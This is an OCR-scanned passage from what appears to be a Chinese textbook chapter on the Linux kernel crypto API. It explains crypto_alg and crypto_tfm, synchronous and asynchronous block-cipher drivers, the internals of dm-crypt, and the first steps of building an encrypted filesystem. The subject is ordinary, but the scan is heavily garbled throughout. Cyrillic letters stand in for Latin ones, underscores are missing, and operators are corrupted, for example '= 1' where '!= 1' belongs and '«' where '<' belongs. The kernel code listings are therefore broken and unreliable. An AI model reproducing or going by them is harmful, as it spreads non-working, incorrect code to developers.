终 的 数据 结构 ， 由 每 个 算法 自己 定义 。 函 数 set key0、encrypt0 和 decrypt0 都 可 以 根据 参数 获得 算法 上 下 文 
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的 指针 。 密 码 管理 器 负责 分 配 算法 上 下 文 所 占 的 内 存 空 间 , 这 一 点 在 注册 alg 时 指定 сіх 的 大 小 和 对 齐 即 可 。 
在 密码 管理 器 分 配 ctx 内 存 时 ， 需 要 进行 内 存 对 齐 。 对 于 一 些 硬件 加 解密 或 者 特殊 要 求 的 算法 ，ctx 的 首 地 
址 可 能 需要 在 内 存 中 4 字 节 或 者 16 字 节 对 齐 ，cra_alignmask 就 是 指定 对 齐 。aes 使 用 的 是 3 (0x11) ， 就 是 
将 首 地 址 低 二 位 清 零 ， 即 4 字 节 对 齐 ， 如 果 要 求 N 字 节 对 齐 CN 是 2 的 某 个 指数 ) ， 那 么 alignmask 就 可 以 
指定 为 N-1。 

crypto_alg 对 应 的 函数 set Кеу(). encrypt()#ll decrypt0 的 原型 如 下 所 示 。 

int set key(struct crypto_tfm *tfm, const u8 *in key, unsigned int key len); 

void encrypt(struct crypto tfm *tfm, u8 *out, const u8 *in); 

void decrypt(struct crypto tfm *tfm, u8 *out, const u8 *in); 

在 上 述 原型 中 ， 各 个 参数 的 具体 说 明 如 下 所 示 。 

口 in 和 out: 分 别 表 示 加 解密 之 前 和 之 后 的 传 入 与 传 出 数据 ， 长 度 是 alg 中 的 blocksize。 

O struct crypto_tfm *: tfm 是 transform 的 缩写 , 所 有 加 密 、 哈 希 算法 的 函数 set_ key、encryptO0 和 decrypt() 

都 带 有 这 个 参数 。 

结构 crypto_tfm 在 文件 <srcdir>/include/linux/crypto.h 中 定义 实现 ， 有 具体 代码 如 下 所 示 。 

#define crt ablkcipher crt_u.ablkcipher 

#define crt_aead crt_u.aead 

#define crt_blkcipher crt_u.blkcipher 

#define crt_cipher crt_u.cipher 

#define crt_hash crt_u.hash 

#define crt compress crt u.compress 

#define crt rng crt u.mg 

struct crypto tfm ( 

u32 crt flags; 


union ( 
Struct ablkcipher tfm ablkcipher; 
struct aead tfm aead; 
struct blkcipher tfm blkcipher; 
struct cipher tfm cipher; 
struct hash tfm hash; 
struct compress tfm compress; 
struct rng tfm mg; 

} ert_u; 

void (*exit)(struct crypto tfm *tfm); 


struct crypto alg * crt alg; 
void * crt сіх[] CRYPTO MINALIGN ATTR; 


Е 
从 上 述 代码 中 可 以 看 出 ， 结 构 crypto tfm. 可 以 继续 分 散 出 一 组 xxx tfm. 格式 的 结构 ，crypto_alg 和 
cipher tfm 相对 应 。 参 数 _crt_ctx[ ] 表 示 算 法 上 下 文 ， 由 此 可 见 ， 算 法 上 下 文 是 跟随 tfm 一 起 分 配 的 ， 从 tfm 
中 可 以 得 到 сіх. ТЕ Linux 系统 中 ,函数 crypto_tfm_ctx0 也 是 在 文件 <sredir>/include/linux/crypto.h 中 定义 的 。 
到 此 为 止 ，alg、crypto_tfm、xxx_tfm 和 ctx 的 基本 关系 全 部 梳理 完毕 ， 具 体 说 明 如 下 所 示 。 
alg: 用 于 注册 。 
crypto_tfm: 是 每 个 算法 实例 对 应 的 结构 。 
xxx tfm: 包含 在 crypto_tfm 中 ， 是 每 类 算法 对 应 的 结构 。 
ctx: 在 crypto_tfm 的 最 后 。 
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当 算法 获得 一 个 crypto tfm 指针 时 ， 可 以 通过 指针 _crt_alg 访问 alg 结构 ， 通 过 crt u.xxx 访问 对 应 算 
法 类 别 的 xxx tfm 结构 ， 通 过 cert сіх 获得 ctx 指针 。 当 算法 获得 一 个 xxx tfm 结构 体 指针 时 ， 可 以 利用 
xxx tfm AIRE crypto_tfm 中 的 这 层 关系 ， 使 用 container of 操作 反 向 获得 crypto_tfm 指针 ， 由 此 可 以 获得 
其 他 的 结构 指针 。 也 可 以 使 用 在 文件 <srcdir>/include/crypto/algapih 中 定义 的 内 联 函数 来 实现 。 

到 此 为 止 ， 一 个 普通 的 分 组 加 密 算法 介绍 完毕 ， 基 本 流程 如 下 所 示 。 

COD 声明 一 个 注册 到 密码 管理 器 中 的 crypto_alg 结构 。 

(2) 当 外 界 使 用 到 该 算法 时 ， 密 码 管理 器 会 自动 创建 crypto_tftm， 并 调用 三 大 函数 进行 加 解密 操作 。 

(3) 如 果 返 回 对 应 的 函数 ， 则 表示 操作 已 经 完成 ， 属 于 同步 操作 。 


2. 同步 块 加 密 


在 Linux 内 核 系 统 中 ， 文 件 <srcdir>/drivers/crypto/geode-aes.c 演示 了 AMD 一 个 硬件 加 密 引 擎 驱动 的 实 
现 过 程 ， 这 是 一 个 典型 的 同步 块 加 密 操 作 。 在 加 密 过 程 中 ， 首 先 以 算法 模块 方式 插入 到 内 核 中 ， 然 后 驱动 
硬件 进行 加 解密 。 首 先 看 在 注册 时 用 到 的 数据 结构 crypto_alg geode_cbc_alg， 具 体 实现 代码 如 下 所 示 。 

static struct crypto alg geode cbc alg = ( 

.cra name = "cbc(aes)", 
.cra driver name = "cbc-aes-geode", 
.cra priority = 400, 
.cra flags = CRYPTO ALG TYPE BLKCIPHER | 
CRYPTO ALG NEED FALLBACK, 
.cra init = fallback init blk, 
.cra exit = fallback exit blk, 
.cra blocksize = AES MIN BLOCK SIZE, 
.cra_ctxsize = sizeof(struct geode aes op), 
.cra alignmask = 15, 
.cra type = &crypto blkcipher type, 
.cra module = THIS MODULE, 
.cra list = LIST HEAD INIT(geode cbc alg.cra list), 
сга и= { 
.blkcipher = { 
тіп keysize = AES MIN KEY SIZE, 
.max keysize = AES MAX KEY SIZE, 
.Setkey = geode setkey blk, 
.encrypt = geode cbc encrypt, 
.decrypt = geode cbc decrypt, 
ivsize = AES IV. LENGTH, 


} 

5 } 
在 alg 结构 中 ， 块 加 密 与 普通 分 组 加 密 的 不 同 之 处 是 .cra_u 的 设置 。 在 普通 分 组 加 密 中 指定 的 是 .cipher， 
在 同步 块 加 密 中 指定 的 是 .blkcipher, 在 异步 块 加 密 中 指定 的 是 .ablkcipher。 在 上 述 过 程 中 用 到 了 函数 cra_init() 
和 cra_exit0， 功 能 是 对 tfm 分 别 实现 初始 化 和 清理 操作 ， 在 此 处 可 以 对 tfm 上 附带 的 ctx 进行 初始 化 操作 。 

在 同步 块 加 密 过 程 中 ， 需 要 用 到 如 下 3 个 函数 原型 。 

int int set_key(struct crypto_tfm *tfm, const u8 *in_key, unsigned int key_len); 

int encrypt(struct blkcipher_desc *desc， struct scatterlist *dst, struct scatterlist *src, unsigned int nbytes); 


int decrypt(struct blkcipher desc *desc, struct scatterlist *dst, struct scatterlist *src, unsigned int nbytes); 
上 述 函 数 的 返回 值 都 是 int， 代 表 一 个 系统 错误 码 。blkcipher_desc 是 贯穿 始终 的 数据 结构 ， 该 结构 在 文 
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fF«srcdir-/include/linux/crypto.h 中 定义 ， 具 体 实现 代码 如 下 所 示 。 
struct blkcipher desc { 
struct crypto blkcipher *tfm; 
void *info; 
u32 flags; 


y: 
tfm 与 普通 分 组 加 密 中 涉及 的 transform 是 一 类 概念 ， 通 过 tim 可 以 得 到 ctx。 因 为 块 加 密 的 散 集 序列 工 
А. (scatterwalk) 在 初始 化 时 直接 将 info 当 作 iv 来 使 用 ， 所 以 通常 用 info 来 保存 ivo 
在 Linux 内 核 中 ， 跟 外 设 交 互 的 方式 有 3 种 ， 分 别 是 WO、 端 口 和 ОМА. HF, DMA 方式 是 由 DMA 
控制 器 来 控制 内 存 、 外 设 间 的 数据 传输 。 在 Linux 内 核 中 , 有 虚拟 地 址 、 物 理 地 址 和 总 线 地 址 3 种 地 址 空间 。 
DMA 要 求 每 次 传输 的 一 整 块 数据 分 布 在 连续 的 总 线 地 址 空间 上 。 而 DMA 是 为 传输 大 块 数据 设计 的 ， 但 是 
大 块 的 连续 总 线 地 址 空间 通常 是 稀缺 的 。 因 此 当 没 有 足够 连续 空间 时 ， 只 能 将 大 块 数据 分 散 到 尽 可 能 少 的 
小 块 连续 地 址 上 ， 然 后 让 DMA 控制 器 逐 块 传送 数据 。 因 此 在 Linux 内 核 中 专门 用 散 集 序列 Cscatterlist) Ж 
据 结构 将 小 块 的 连续 总 线 地 址 串 起 来 ， 并 交 给 DMA 驱动 自动 地 一 个 接着 一 个 地 传输 。 其 实 scatterlist 就 是 
-个 线性 表 (scatterlist 可 以 是 链表 ， 也 可 以 是 数组 ) ， 每 个 元 素 包 含 一 个 指针 指向 一 块 总 线 地 址 连续 的 内 
存 块 ， 这 是 为 DMA 量 身 定做 的 数据 结构 。 
结构 scatterlist 在 文件 <srcdir>/arch/ 某 体系 结构 /include/scatterlisth 中 定义 ， 在 x86 架构 中 使 用 的 是 通用 
定义 ， 在 <srcdir>/arch/asm-generic/include/scatterlist.h 中 实现 ， 有 具体 定义 代码 如 下 所 示 。 
struct scatterlist ( 
#ifdef CONFIG DEBUG SG 
unsigned long sg magic; 
#endif 
unsigned long page link; 
unsigned int offset; 
unsigned int length; 
dma addr tdma address; 
unsigned int dma length; 


y 

对 上 述 代 码 的 具体 说 明 如 下 所 示 。 

page link: 用 于 指定 该 内 存 块 在 哪 一 个 页 面 中 ， 低 二 位 分 别 用 作 链 表 / 数 组 选择 标志 和 结束 标志 。 
offset: 表示 内 存 块 在 页 面 中 的 偏 移 。 

length: 表示 数据 块 长 度 。 

dma_address: 表示 内 存 块 的 总 线 地 址 。 

dma length: 表示 总 线 地 址 空间 长 度 ， 与 length 区 别 是 length 用 于 32 位 平台 的 ， 而 dma_length 用 于 64 
位 平台 。 


3. 异步 块 加 密 


在 Linux 内 核 系 统 中 ， 文 件 <srcdir>/drivers/crypto/mv_cesa.c 演示 了 异步 块 加 密 的 过 程 ， 此 文件 实现 了 
Marvell 的 一 个 硬件 加 密 引 擎 驱动 。 在 文件 <sredir>/drivers/crypto/mv_cesa.c 中 ， 定 义 alg 的 代码 如 下 所 示 。 

struct crypto_alg mv_aes alg cbc ={ 

.cra name = "cbc(aes)", 

.cra_driver_name = "mv-cbc-aes", 

.cra priority = 300, 

.cra flags = СКҮРТО ALG TYPE ABLKCIPHER | CRYPTO ALG ASYNC, 

.cra_blocksize = AES BLOCK SIZE, 

.cra_ctxsize = sizeof(struct mv сіх), 


DO DDD 


егез 


.cra alignmask = 0, 
.cra_type = &crypto ablkcipher type, 
.cra module = THIS MODULE, 
.cra init = mv cra init, 
сга и={ 
.ablkcipher = { 
.ivsize = AES_BLOCK SIZE, 
.min keysize = AES MIN KEY SIZE, 
.max keysize - AES MAX KEY SIZE, 
.Setkey = mv setkey aes, 
.encrypt = mv enc aes cbc, 
.decrypt mv dec aes cbc, 
Y 
h 


y 
通过 分 析 上 述 代码 可 知 , 与 同步 块 加 密 的 区 别 是 era. flags 和 сга type 不 同 , 两 者 指定 的 cra_u.ablkcipher 
结构 不 同 ， 该 结构 也 有 set_key0、encryptO0、decrypt(O) 三 个 函数 ， 具 体 原 型 如 下 所 示 。 
int set key(struct crypto ablkcipher *cipher, const u8 *key, unsigned int len); 
int encrypt(struct ablkcipher request *req); 
int decrypt(struct ablkcipher request *req); 
HP, KA set_key() 的 第 一 个 参数 struct crypto_ablkcipher *cipher 就 是 crypto_tfm. ifi Р encrypt() Il 
decrypt() 的 参数 struct ablkcipher request *req 表示 的 是 异步 请 求 ， 具 体 代 码 如 下 所 示 。 
struct ablkcipher_request { 
struct crypto async request base; 
unsigned int nbytes; 
void *info; 
Struct scatterlist *src; 
struct scatterlist *dst; 
void* ctx[] CRYPTO MINALIGN ATTR; 


y 

由 此 可 见 , 这 是 专 为 参数 传递 准备 的 一 个 结构 。 与 同步 块 加 密 和 普通 分 组 加 密 不 同 的 是 , 在 ablkcipher request 
后 面 也 有 一 个 etx, 与 crypto_tfm 的 ctx 不 同 之 处 是 后 者 是 每 个 实例 的 ctx, 在 函数 init(crypto_tfm*) 中 实现 初始 化 。 
而 ablkcipher request 的 ctx 属于 每 一 个 request. encrypt 和 decrypt 中 的 初始 化 。 这 两 个 ctx 的 大 小 相同 ， 都 
是 由 alg 的 ctx_size 决定 的 。 结构 crypto_async request base 用 于 实现 异步 通知 ，nbytes、src、dst 和 同步 块 加 
密 函 数 encrypt0、decryptO 对 应 参数 一 样 ， info 通常 作为 iv 的 指针 来 使 用 。 如 果 没 有 iv， 可 以 当做 他 用 。 
在 base 成 员 中 有 complete() 函 数 指针 ,其 类 型 为 typedef void (*crypto_completion_t)(struct crypto async request 
*req, int err)， 这 个 函数 是 由 异步 块 加 密 算法 调用 的 。 当 完成 某 个 异步 request 操作 时 ， 通 过 调用 该 函数 可 以 
通知 request 已 经 完成 。 其 中 第 一 个 参数 就 是 这 个 request 指针 ， 第 二 个 参数 是 系统 错误 码 。 

因为 是 异步 操作 ， 所 以 Linux 系统 为 算法 提供 了 一 个 请 求 缓存 池 ， 有 具体 功能 可 以 通过 在 文件 <srcdir/ 
include/crypto/algapi.h 中 定义 的 函数 ablkcipher_enqueue_request 和 ablkcipher dequeue request 实现 操作 。 


6.1.2 Dmorypt 加 密 机 制 分 析 
Dmerypt 是 DM 构架 中 用 于 块 设备 加 密 的 模块 。 Dmcerypt 通过 DM 虚拟 一 个 块 设备 ， 并 在 bio 转发 时 将 


数据 加 密 后 存储 来 实现 块 设备 的 加 密 ， 而 这 些 对 于 应 用 层 来 说 都 是 透明 的 。Dmcrypt 的 加 密 机 制 在 文件 
drivers/md/dm-crypt.c 中 实现 ， 其 中 定义 target_type 类 型 结构 体 crypt_target 的 代码 如 下 所 示 。 


(m, 
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static struct target type crypt target = ( 
.name = "crypt", 
. Version = (1, 7, 0), 
.module = THIS MODULE, 
.ctr = crypt ctr, 
.dtr = crypt dtr, 
.map = crypt map, 
.status = crypt status, 
.postsuspend = crypt postsuspend, 
.preresume = crypt preresume, 
resume = crypt resume, 
message = crypt message, 
merge = crypt merge, 
„iterate devices = crypt iterate devices, 
X 


在 上 述 代码 中 用 到 了 函数 ctr0 和 тар(), HEF, В ctr0 不 但 决定 了 设备 的 创建 过 程 ， 也 决定 了 与 密码 


算法 的 关联 过 程 。 而 函数 map0 不 但 决定 了 bio 的 转发 功能 ， 而 且 也 决定 了 对 密码 算法 调用 的 步骤 。 
在 文件 drivers/md/dm-crypt.c 中 ， 通 过 函数 crypt_ctr0 创 建 密码 算法 实例 ， 有 具体 实现 代码 如 下 所 示 。 


static int crypt ctr(struct dm target *ti, unsigned int argc, char **argv) 
{ 

struct crypt_config *cc; 

unsigned int key_size; 

unsigned long long tmpll; 

int ret; 


if (argc != 5) ( 
ti->error = "Not enough arguments"; 
return -EINVAL; 

} 


key_size = strlen(argv[1]) >> 1; 


сс = kzalloc(sizeof(*cc) + key size * sizeof(u8), GFP_KERNEL); 
(їсс) ( 

ti->error = "Cannot allocate encryption context"; 

return -ENOMEM; 
} 


ti->private = сс; 
ret = crypt ctr cipher(ti, argv[0], argv[1]); 
if (ret « 0) 

goto bad; 


ret = -ENOMEM; 
cc->io_pool = mempool create slab pool(MIN IOS, crypt io pool); 
if (Icc-»io pool) { 

ti->error = "Cannot allocate crypt io mempool"; 

goto bad; 
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cc->dmreq start = sizeof(struct ablkcipher request); 

cc->dmreq_start += crypto ablkcipher reqsize(cc-»tfm); 

cc-»dmreq start = ALIGN(cc->dmreq_start, crypto tím ctx alignment()); 

cc->dmreq_start += crypto_ablkcipher_alignmask(cc->tfm) & 
~(crypto tfm ctx alignment() - 1); 


cc->req_pool = mempool create kmalloc pool(MIN 105, cc-»dmreq start + 
sizeof(struct dm crypt request) + сс->іу size); 
if (Icc-»req роо!) { 
ti->error = "Cannot allocate crypt request mempool"; 
goto bad; 
} 
cc->req = NULL; 


cc->page_pool = mempool create page pool(MIN POOL PAGES, 0); 
if (Icc-»page pool) ( 

ti->error = "Cannot allocate page mempool"; 

goto bad; 
} 


cc->bs = bioset create(MIN IOS, 0); 

if (!cc->bs){ 
ti->error = "Cannot allocate crypt bioset"; 
goto bad; 

} 


ге! = -EINVAL; 

if (sscanf(argv[2], "%llu", &tmpll) != 1) ( 
ti->error = "Invalid iv_offset sector"; 
goto bad; 

} 


cc->iv_offset = tmpll; 


if (dm_get_device(ti, argv[3], dm_table_get_mode(ti->table), &cc->dev)) { 
ti->error = "Device lookup failed"; 
goto bad; 

} 


if (sscanf(argv[4], "%llu", &tmpll) = 1) { 
ti->error = "Invalid device sector"; 
goto bad; 

} 


cc-»start = tmpll; 


ret = -ENOMEM; 
cc->io_queue = create singlethread workqueue("kcryptd io"); 
if (Icc-»io queue) ( 

ti->error = "Couldn't create kcryptd io queue"; 

goto bad; 
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сс->сгурі queue = create singlethread workqueue("kcryptd"); 
if (Icc-»crypt queue) ( 

ti->error = "Couldn't create kcryptd queue"; 

goto bad; 
} 


ti->num_flush requests = 1; 
геїигп 0; 


bad: 


crypt_dtr(ti); 
return ret; 


} 

通过 上 述 代码 可 知 ， 函 数 crypt_ctr0 的 参数 格式 如 下 。 

<cipher> <key> <iv_offset> <dev_path> <start> 

上 述 参数 在 ctr 中 被 逐个 解析 并 被 存放 到 结构 crypt_config 中 ， 各 个 格式 的 具体 说 明 如 下 所 示 。 
(1) <cipher>: 其 格式 是 cipher-chainmode-ivopts:ivmode， 有 具体 说 明 如 下 所 示 。 


口 
口 


口 
口 


cipher: 是 算法 注册 时 的 cra_name。 

chainmode: 是 ecb 或 cbc 之 类 ，chainmode 的 默认 选项 是 cbc， 如 果 chainmode 不 是 ecb， 则 必须 指定 
ivmode。 

ivmode: 有 5 种 ， 分 别 是 plain、plain64、essiv、benbi 和 null， 分 别 对 应 不 同 的 iv 生成 算法 。 

ivopts: 是 传 给 这 儿 种 ivmode 的 ctr 的 参数 ， 其 中 ，null、benbi、plain 和 plain64 没 有 用 到 ，essiv 能 够 
将 ivopts 作 为 在 系统 中 注册 的 哈 希 算法 名 ， 由 该 哈 希 算法 生成 iv。 


(2) <start>: 是 加 密 的 起 始 块 ， 在 start 之 前 不 由 dm-crypt 管理 控制 。 
(3) <iv_offset>: 是 为 了 保存 iv 到 磁盘 上 而 预 留 位 置 ， 单 位 是 sector. TE dm-crypt 设备 上 的 偏 移 是 sector 
的 bio 对 应 与 原始 磁盘 上 sector+<iv_offset>+<start> 偏 移 的 块 。 对 于 dm-crypt 内 部 来 说 ， 偏 移 为 
sector+<iv_offset>， 也 就 是 说 dm-crypt 内 部 将 iv 所 占据 的 块 隐藏 了 。 
在 文件 drivers/md/dm-crypt.c 中 ， 函 数 crypt_map0 的 功能 是 修改 bio 的 内 容 然后 转发 ， 实 现 IO 操作 。 
函数 crypt_map0) 操 作 ИО 的 具体 实现 流程 如 下 所 示 。 
(1) 先进 行 IO 操作 ， 将 数据 从 真正 的 块 设备 中 读 取出 来 ， 然 后 进行 解密 操作 。 
(2) 在 写 操作 时 先 将 数据 解密 ， 然 后 将 数据 写 入 真正 的 块 设备 中 。 
上 述 两 种 操作 都 是 通过 异步 方式 实现 的 ， 函 数 crypt_map0 的 具体 实现 代码 如 下 所 示 。 
static int crypt map(struct dm target *ti, struct bio *bio, 


{ 


union map_info *map_context) 


struct dm crypt io *io; 
Struct crypt config *cc; 


if (unlikely(bio empty barrier(bio))) { 
cc = ti->private; 
bio->bi_bdev = cc->dev->bdev; 
retum DM_MAPIO_REMAPPED; 
} 


io = crypt_io_alloc(ti, bio, dm_target_offset(ti, bio->bi_sector)); 


if (bio_data_dir(io->base_bio) == READ) 
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kcryptd queue іо(іо); 
else 
kcryptd queue crypt(io); 


return DM MAPIO SUBMITTED; 
} 
通过 上 述 实现 代码 可 知 ， 函 数 crypt_map0 的 读 取 流 程 如 下 所 示 。 
(1) 调用 函数 keryptd queue io0， 在 io 结构 中 包含 了 bio 和 i 等 信息 ， 具 体 代码 如 下 所 示 。 
static void kcryptd queue io(struct dm crypt io *io) 


{ 
struct crypt_config *cc = io->target->private; 
INIT_WORK(&io->work, kcryptd io); 
queue могк(сс->іо queue, &io->work); 
} 
(2) 调用 函数 queue_work() 将 信 0 到 io 队列 ， 并 通过 函数 kcryptd_io0 实 现 1/0 操作 ， 具 体 代码 如 
下 所 示 。 
static void kcryptd io(struct work struct *work) 
{ 
struct dm_crypt_io *io = container_of(work, struct dm_crypt_io, work); 
if (bio_data_dir(io->base_bio) == READ) 
kcryptd io read(io); 
else 
kcryptd io write(io); 
) 


(3) 通过 函数 keryptd_io_read0) 实 现 反 向 获取 ， 其 中 io 是 work 的 容器 ， 具 体 代码 如 下 所 示 。 
static void kcryptd io read(struct dm crypt io *io) 
{ 
struct crypt_config *cc = io->target->private; 
struct bio *base_bio = io->base_bio; 
struct bio *clone; 


crypt_inc_pending(io); 


pt 
* The block layer might modify the bvec array, so always 
* copy the required bvecs because we need the original 
* one in order to decrypt the whole bio data *afterwards* 
ii 
clone = bio alloc bioset(GFP NOIO, bio segments(base bio), cc->bs); 
if (unlikely(!clone)) ( 
io->error = -ENOMEM; 
crypt dec pending(io); 
return; 


} 


clone init(io, clone); 
clone-»bi idx = 0; 
clone->bi_vent = bio segments(base bio); 
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clone->bi_size = base bio-»bi size; 

clone-»bi sector = cc->start + io->sector; 

memcpy(clone-»bi io vec, bio iovec(base bio), 
sizeof(struct bio vec) * clone-»bi успі); 


generic make request(clone); 
) 

(4) 通过 函数 generic make _ request(0) 实 现 异 步 JO， 其 中 clone 是 io-^base bio 的 “克隆 ”， 设 置 了 有 
异步 回调 。 然 后 通过 函数 crypt_endio() 实 现 读 操作 后 的 回调 工作 ， 将 得 到 的 密 文保 存在 clone 中 。 有 具体 代码 
如 下 所 示 。 

static void crypt_endio(struct bio *clone, int error) 


{ 


struct dm crypt io *io = clone->bi_private; 
struct crypt config *cc = io-»target-» private; 
unsigned rw 7 bio data dir(clone); 


if (unlikely(Ibio flagged(clone, BIO UPTODATE) && !error)) 
error = -EIO; 


p 
* free the processed pages 
ji 
if (rw == WRITE) 
crypt free buffer pages(cc, clone); 


bio put(clone); 


if (rw == READ && terror) ( 
kcryptd queue crypt(io); 
return; 


) 


if (unlikely(error)) 
io->error = error; 


crypt dec pending(io); 
} 
(5) 在 函数 kcryptd_queue_crypt0 中 通过 clone 得 到 io， 具 体 代 码 如 下 所 示 。 
static void kcryptd queue crypt(struct dm crypt io *io) 


{ 
struct crypt_config *cc = io->target->private; 
INIT_WORK(&io->work, kcryptd crypt); 
queue work(cc-»crypt queue, &io->work); 
) 


(6) 通过 queue. wor 添加 到 crypt 队列 后 ， 通 过 函数 kcryptd_crypt_read_convert0 实 现 反 向 获取 功能 ， 
中 参数 io 是 work 的 容器 。 上 有 具体 实现 代码 如 下 所 示 。 
static void kcryptd crypt read convert(struct dm crypt io *io) 
{ 
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struct crypt_ config *cc = io->target->private; 
intr = 0; 


crypt inc pending(io); 


crypt convert init(cc, &io->ctx, io->base bio, io->base bio, 
io->sector); 


r = crypt convert(cc, &io->ctx); 


if (atomic_dec_and_test(&io->ctx.pending)) 
kcryptd crypt read done(io, г); 


crypt dec pending(io); 
) 
(7) 在 函数 crypt_convert0 中 通过 іо 获得 cc， 有 具体 代码 如 下 所 示 。 
static int crypt convert(struct crypt config *cc, 
Struct convert context *ctx) 


{ 


int r; 
atomic_set(&ctx->pending, 1); 


while(ctx->idx_in < ctx->bio_in->bi_vcnt && 
ctx->idx_out < ctx->bio_out->bi_vent) { 


crypt_alloc_req(cc, ctx); 
atomic_inc(&ctx->pending); 
r = crypt convert block(cc, ctx, cc->req); 


switch (r) ( 

/** async */ 

case -EBUSY: 
wait for completion(&ctx-»restart); 
INIT COMPLETION(ctx-"restart); 
/* fall through*/ 

case -EINPROGRESS: 
cc->req = NULL; 
ctx->sector++; 
continue; 


/** sync */ 
case 0: 
atomic dec(&ctx-»pending); 
ctx->sector++; 
cond resched(); 
continue; 


/** error */ 


default: 
atomic dec(&ctx-»pending); 
return r; 


} 


return 0; 
} 
(8) 调用 函数 crypt_convert_block() 执 行 加 密 请 求 ， 具 体 代 码 如 下 所 示 。 
static int crypt_convert block(struct crypt_config *cc, 
Struct convert context *ctx, 
struct ablkcipher request *req) 


struct bio vec *bv in = bio iovec idx(ctx-»bio in, сіх->іах in); 
struct bio vec *bv_out = bio iovec idx(ctx-»bio out, сіх->ійх out); 
struct dm crypt request *dmreq; 

u8 *iv; 

intr = 0; 


dmreq = dmreq of геа(сс, req); 
iv = (u8 *)ALIGN((unsigned long)(dmreq + 1), 
crypto ablkcipher alignmask(cc-»tfm) + 1); 


dmreq->ctx = ctx; 

Sg init table(&dmreq->sg_in, 1); 

Sg set page(&dmreq-»sg in, bv in-»bv page, 1 << SECTOR SHIFT, 
bv in-»bv offset + ctx-2offset in); 


sg init table(&dmreq-»sg out, 1); 
Sg set page(&dmreq-»sg out, bv out-»bv page, 1 << SECTOR SHIFT, 
bv out-»bv offset + ctx-»offset out); 


ctx-»offset in += 1 << SECTOR SHIFT; 
if (ctx-2offset in >= bv in-»bv len) ( 
ctx-»offset in = 0; 
ctx-»idx іп++; 


} 


ctx->offset_out += 1 << SECTOR SHIFT; 
if (ctx->offset_out >= bv_out->bv_len) { 
ctx->offset_out = 0; 
ctx->idx_out++; 


} 


if (cc->iv_gen_ops) { 
r = сс->іу деп _орѕ->депегаќог(сс, iv, ctx->sector); 
if (r < 0) 
return r; 


H 


ablkcipher request set crypt(req, &dmreq->sg_in, &dmreq-»sg out, 
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1<< SECTOR SHIFT, iv); 


if(bio data dir(ctx-»bio in) == WRITE) 
r-crypto ablkcipher encrypt(req); 
else 
r = crypto ablkcipher decrypt(req); 


return r; 


} 

在 上 述 代码 中 , 通过 函数 crypto_ablkcipher_decrypt(req) 调 用 了 异步 加 密 算法 。 由 此 可 以 看 出 ,如果 异步 
密码 算法 的 encrypt 和 decrypt 返回 的 是 EBUSY， 则 dm-crypt 陷入 等 待 之 中 。 如 果 返 回 EINPROGRESS， 则 
表示 已 将 请 求 移入 队列 ，dm-crypt 会 继续 下 一 个 请 求 。 如 果 返 回 0， 则 表示 已 经 完成 操作 ， 蜡 步 变 成 同步 。 
由 此 可 见 ，dm-crypt 是 支持 同步 块 加 密 功 能 的 。 

(9) 调用 函数 keryptd_crypt_read_done(io, error) 清理 io， 完 成 整个 读 取 操 作 ， 具 体 代码 如 下 所 示 。 
static void kcryptd crypt read done(struct dm crypt io *io, int error) 


if (unlikely(error « 0)) 
io->error = -EIO; 


crypt dec pending(io); 


) 
写 操作 的 流程 与 读 操作 类 似 ， 不 同 之 处 在 于 要 先进 行 encrypt， 然 后 再 进行 VO 操作 。 由 此 可 见 ， 写 操 
作 的 两 次 VO 异步 操作 发 生 在 两 次 crypt 异步 之 后 。 
(10) 最 后 会 通过 函数 crypt_dec_pending() 通 知 上 层 当 前 VO 操作 流程 结束 ， 有 具体 代码 如 下 所 示 。 
static void crypt dec pending(struct dm crypt io *io) 
{ 
struct crypt_config *cc = io->target->private; 
struct bio *base_bio = io->base_bio; 
struct dm_crypt_io *base_io = io->base_io; 
int error = io->error; 


if (latomic dec and test(&io-^pending)) 
return; 
mempool free(io, cc-»io pool); 
if (likely(!base_io)) 
bio endio(base bio, error); 
else ( 
if (error && !base_io->error) 
base іо->еггог = error; 
crypt dec pending(base io); 


) 
6.1.3 ”使 用 dmcrypt 机 制 构建 加 密 文件 系统 


dmerypt 机 制 是 建立 在 device-mapper 特性 之 上 的 ，device-mapper 是 设计 用 来 为 在 实际 的 块 设备 之 上 添 
加 虚拟 层 提供 一 种 通用 灵活 的 方法 ， 以 方便 开发 人 员 实现 镜像 、 快 照 、 级 联 和 加 密 等 处 理 。 此 外 ，dmcrypt 
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机 制 使 用 内 核 密码 应 用 编程 接口 实现 了 透明 的 加 密 ， 并 且 兼 容 cryptloop 系统 。 使 用 dmerypt 机 制 构 建 加 密 
文件 系统 的 基本 流程 如 下 所 示 。 
(1) 准备 好 内 核 
dmcrypt 利用 内 核 的 密码 应 用 编程 接口 来 完成 密码 操作 。 一 般 说 来 ， 内 核 通常 将 各 种 加 密 程 序 以 模块 的 
形式 加 载 。 对 于 AES 来 说 ， 其 安全 强度 已 经 非常 高 ， 已 经 足够 保护 绝密 级 的 数据 。 为 了 保证 用 户 的 内 核 已 
经 加 载 了 AES 密码 模块 ， 需 要 根据 如 下 命令 进行 检查 。 
sicat /proc/crypto 
否则 ， 可 以 使 用 modprobe 来 手工 加 载 AES 模块 ， 具 体 命令 如 下 所 示 。 
#modprobe aes 
接 下 来 安装 dmsetup 软件 包 ， 该 软件 包含 配置 device-mapper 所 需 的 工具 ， 具 体 命令 如 下 所 示 。 
#yum install dmsetup cryptsetup 
为 了 检查 dmsetup 软件 包 是 否 已 经 建立 了 设备 映像 程序 ， 需 要 输入 下 列 命令 。 
#ls -| /dev/mapper/control 
然后 ， 需 要 使 用 如 下 命令 加 载 dm-crypt 内 核 模块 。 
#modprobe dm-crypt 
加 载 dm-crypt 后 会 用 evice-mapper 实现 自动 注册 。 如 果 再 次 检验 ，device-mapper 已 能 识别 dm-crypt, 
并 且 把 crypt 添加 为 可 用 的 对 象 。 执 行 完 上 述 步骤 后 ， 用 户 可 以 看 到 crypt 的 下 列 输出 。 
#dmsetup targets 
这 说 明 系 统 已 经 为 装载 加 密 设备 做 好 了 准备 。 
(2) 创建 加 密 设备 
有 两 种 创建 作为 加 密 设备 装载 文件 系统 的 方法 ， 一 是 建立 一 个 磁盘 映像 ， 然 后 作为 回 送 设备 加 载 ， 二 
是 使 用 物理 设备 。 无 论 使 用 哪 一 种 方法 ， 除 了 建立 和 捆绑 回 送 设备 外 ， 其 他 操作 过 程 都 是 相似 的 。 
(3) 建立 回 送 磁盘 映像 
如 果 用 户 没有 用 来 加 密 的 物理 设备 作为 替换 ， 例 如 ， 存 储 棒 或 另外 的 磁盘 分 区 ， 可 以 利用 命令 dd KE 
